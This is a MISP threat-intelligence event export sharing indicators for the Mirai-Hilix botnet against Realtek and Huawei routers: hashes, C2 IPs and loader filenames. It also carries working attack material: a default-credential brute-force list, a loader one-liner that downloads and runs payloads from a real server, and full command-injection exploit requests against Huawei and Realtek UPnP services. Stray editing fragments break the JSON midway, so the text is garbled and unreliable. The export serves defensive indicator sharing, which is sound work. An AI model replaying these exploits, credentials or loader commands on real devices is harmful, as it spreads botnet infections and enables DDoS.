{
"Event": {
"analysis": "2",
"date": "2020-05-14",
"extends_uuid": "508411ea-0680-428f-b6e7-183070db547e",
"info": "Linux/Mirai-Hilix (w/New TABLE encoder) aims Realtek & Huawei routers",
"publish_timestamp": "1589487314",
"published": true,
"threat_level_id": "3",
"timestamp": "1589487271",
"uuid": "5ebd9f11-4628-4dc2-abaf-4d54950d210f",
"Orgc": {
"name": "MalwareMustDie",
"uuid": "569e04b2-efd0-45bd-b83a-4f7b950d210f"
},
"Tag": [
{
"colour": "#ffffff",
"local": false,
"name": "tlp:white",
"relationship_type": ""
},
{
"colour": "#3a7300",
"local": false,
"name": "circl:incident-classification=\"malware\"",
"relationship_type": ""
},
{
"colour": "#22681c",
"local": false,
"name": "malware_classification:malware-category=\"Botnet\"",
"relationship_type": ""
},
{
"colour": "#ff0000",
"local": false,
"name": "Mirai",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Internal reference",
"comment": "Technical announcement and analysis report",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485800",
"to_ids": false,
"type": "link",
"uuid": "5ebda0e8-d424-4544-accb-4540950d210f",
"value": "https://www.virustotal.com/gui/file/a7f3670b9720fd2092d0cd0f52b46fecd431d442a9bff6ec8839e854147b7c53/community"
},
{
"category": "Internal reference",
"comment": "Technical announcement and analysis report",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485800",
"to_ids": false,
"type": "link",
"uuid": "5ebda0e8-733c-4f46-a368-4b7e950d210f",
"value": "https://old.reddit.com/r/LinuxMalware/comments/gj1x02/linuxmirai_hilix/"
},
{
"category": "Internal reference",
"comment": "Technical announcement and analysis report",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485800",
"to_ids": false,
"type": "link",
"uuid": "5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
"value": "https://imgur.com/a/lWbs6T1"
},
{
"category": "Internal reference",
"comment": "Technical announcement and analysis report",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485800",
"to_ids": false,
"type": "link",
"uuid": "5ebda0e8-b39c-4e34-8fde-48f7950d210f",
"value": "https://twitter.com/malwaremustd1e/status/1260582039503417344"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485980",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19c-1004-4b99-af52-4bcb950d210f",
"value": "7a5e717aa86fd986d9aef089c6e07bcd"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-5838-41fe-a455-481a950d210f",
"value": "8293c25c4c759654ea72342750a91170"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
"value": "94008c192bd62432fbacede828e2c497"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-39e8-459b-8128-458e950d210f",
"value": "749d282b6ff9e1b9390201173af694c0"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-ea98-4dd8-bda1-4847950d210f",
"value": "34307f52ba4a81d94058c130df146c5a"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-60e0-4e0c-a372-45c1950d210f",
"value": "84d45afab65260068009911871f5babd"
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix new encoder hashes",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589485981",
"to_ids": false,
"type": "md5",
"uuid": "5ebda19d-71f4-4308-baa0-4fe2950d210f",
"value": "ec413215dc385d95e1c89d9bda44de4d"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader script filename",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486100",
"to_ids": false,
"type": "filename",
"uuid": "5ebda214-8710-467a-aa11-4de1950d210f",
"value": "Hilix.sh"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader script filename",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486100",
"to_ids": false,
"type": "filename",
"uuid": "5ebda214-08f8-4218-bc78-42a6950d210f",
"value": "Hilix1.sh"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader script filename",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486100",
"to_ids": false,
"type": "filename",
"uuid": "5ebda214-89a0-452e-8f30-4874950d210f",
"value": "Hilix2.sh"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader script filename",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486100",
"to_ids": false,
"type": "filename",
"uuid": "5ebda214-02e4-4f15-8e44-4feb950d210f",
"value": "Hilix3.sh"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader script filename",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486100",
"to_ids": false,
"type": "filename",
"uuid": "5ebda214-b6e4-4cf5-a789-46a7950d210f",
"value": "Hilix4.sh"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-13T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486323",
"to_ids": false,
"type": "ip-src",
"uuid": "5ebda2f3-d320-4e88-b43c-4c03950d210f",
"value": "142.93.217.221"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-13T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486323",
"to_ids": false,
"type": "ip-src",
"uuid": "5ebda2f3-d174-41d1-a36e-44cb950d210f",
"value": "159.203.44.33"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-13T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486323",
"to_ids": false,
"type": "ip-src",
"uuid": "5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"value": "194.180.224.124"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-13T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486324",
"to_ids": false,
"type": "ip-src",
"uuid": "5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"value": "194.180.224.150"
},
{
"category": "Targeting data",
"comment": "Linux/Mirai Hilix targeted products (telnet default password)",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486529",
"to_ids": false,
"type": "comment",
"uuid": "5ebda3c1-a0e4-41db-a6a5-43ee950d210f",
"value": "\"root\",\"xc3511\"\r\n\"root\",\"xc3518\"\r\n\"root\",\"xc3515\"\r\n\"vstarcam2015\",\"20150602\"\r\n\"admin\",\"admin\"\r\n\"root\",\"zte9x15\"\r\n\"root\",\"vizxv\"\r\n\"root\",\"admin\"\r\n\"root\",\"vertex25ektks123\"\r\n\"admin\",\"vertex25ektks123\"\r\n\"root\",\"Zte521\"\r\n\"default\"\r\n\"default\",\"OxhlwSG8\"\r\n\"default\",\"S2fGqNFs\"\r\n\"default\",\"lJwpbo6\"\r\n\"default\",\"antslq\"\r\n\"guest\",\"xc3511\"\r\n\"admin\",\"aquario\"\r\n\"support\",\"support\"\r\n\"admin\",\"password\"\r\n\"user\",\"user\"\r\n\"admin\",\"admin1234\"\r\n\"admin\",\"1111\"\r\n\"guest\",\"guest\"\r\n\"guest\",\"12345\"\r\n\"admin\",\"1234\"\r\n\"admin\",\"ipcam_rt5350\"\r\n\"root\",\"ipcam_rt5350\"\r\n\"admin\",\"ho4uku6at\"\r\n\"admin\",\"kont2004\"\r\n\"admin\",\"Win1doW$ \"\r\n\"root\",\"hunt5759\"\r\n\"admin\",\"COadmin123\"\r\n\"admin\",\"ZmqVfoSIP\"\r\n\"root\",\"3ep5w2u\""
},
{
"category": "Payload installation",
"comment": "Linux/Mirai Hilix loader script injection (bruteforce default password)",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486673",
"to_ids": false,
"type": "comment",
"uuid": "5ebda451-d9f4-47c6-b3d5-4ce5950d210f",
"value": "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/Hilix.sh; curl -O http://194.180.224.124/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 194.180.224.124 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 194.180.224.124; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf *; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/bins/Hilix.x86 -O /tmp/Hilix; chmod +x /tmp/Hilix; /tmp/Hilix sbot.x86"
},
{
"category": "Payload delivery",
"comment": "Linux/Mirai Hilix loader's infection script injection (Realtek, Huawei routers vulnerabilities)",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589486864",
</gr_replreplace>
<gr_replace lines="1018-1019" cat="remove_boilerplate" orig="|">
"to_ids": false,
|
|
"type": "comment",
"uuid": "5ebda510-e6b4-49ac-b728-422c950d210f",
"value": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\\r\\nContent-Length: 430\\r\\nConnection: keep-alive\\r\\nAccept: */\u00ef\u00bc\u0160\\r\\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 159.203.44.33 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\nPOST /picdesc.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\n\r\nPOST /wanipcn.xml HTTP/1.1\\r\\nHost: 
127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n"
|
|
},
{
"category": "Network activity",
"comment": "Linux/Mirai Hilix DDoS attack methods",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-05-12T00:00:00+00:00",
"last_seen": "2020-05-15T00:00:00+00:00",
"timestamp": "1589487163",
"to_ids": false,
"type": "comment",
"uuid": "5ebda63b-a5b4-4b74-9ca1-4130950d210f",
"value": "attack_method_greip\r\nattack_method_greeth\r\nattack_method_std\r\nattack_method_tcpsyn\r\nattack_method_tcpack\r\nattack_method_tcpstomp\r\nattack_method_tcpxmas\r\nattack_method_udpgeneric\r\nattack_method_udpvse\r\nattack_method_udpdns\r\nattack_method_udpplain"
}
]
}
}